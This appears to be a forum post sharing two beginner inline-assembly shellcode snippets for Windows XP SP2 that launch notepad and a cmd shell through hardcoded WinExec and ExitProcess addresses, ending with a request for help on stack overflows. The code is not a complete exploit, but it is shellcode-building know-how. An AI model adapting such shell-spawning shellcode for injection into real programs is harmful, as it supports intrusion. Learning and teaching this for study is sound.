Here are some functions ,like WinExec() and exit() ,it's a shellcode for notepad ,but as you observe it isn't injectable.Tested on windows xp sp2,compiled with VC++.
main()
{
_asm{


push ebp
mov ebp,esp

push ebx

push esi
push edi




mov byte ptr [ebp-8],6Eh
mov byte ptr [ebp-7],6Fh
mov byte ptr [ebp-6],74h
mov byte ptr [ebp-5],65h
mov byte ptr [ebp-4],70h
mov byte ptr [ebp-3],61h
mov byte ptr [ebp-2],64h
mov byte ptr [ebp-1],0

push 5
lea eax,[ebp-8]
push eax

mov eax,0x7c86136d
call eax

push 1

mov eax,0x7c81cdda
call eax
//the address may not be the same,so calculate it yourself with Microsoft SDk with depends.exe tool
//add the kernel address and the entry point address
}

}

Here's for CMD shell.

//author fl0 fl0w
void main(){
_asm{
push ebp
mov ebp,esp
sub esp,44h
push ebx
push esi
push edi
lea edi,[ebp-44h]
mov ecx,11h
mov eax,0CCCCCCCCh
rep stos dword ptr [edi]

mov byte ptr [ebp-4],63h

mov byte ptr [ebp-3],6Dh

mov byte ptr [ebp-2],64h

mov byte ptr [ebp-1],0

push 5
lea eax,[ebp-4]
push eax

mov eax,0x7c86136d
call eax

push 1

mov eax,0x7c81cdda
call eax

}}Btw who is most experienced in stack overflows ?I'm having some problems ,hoping I can get someone to help me.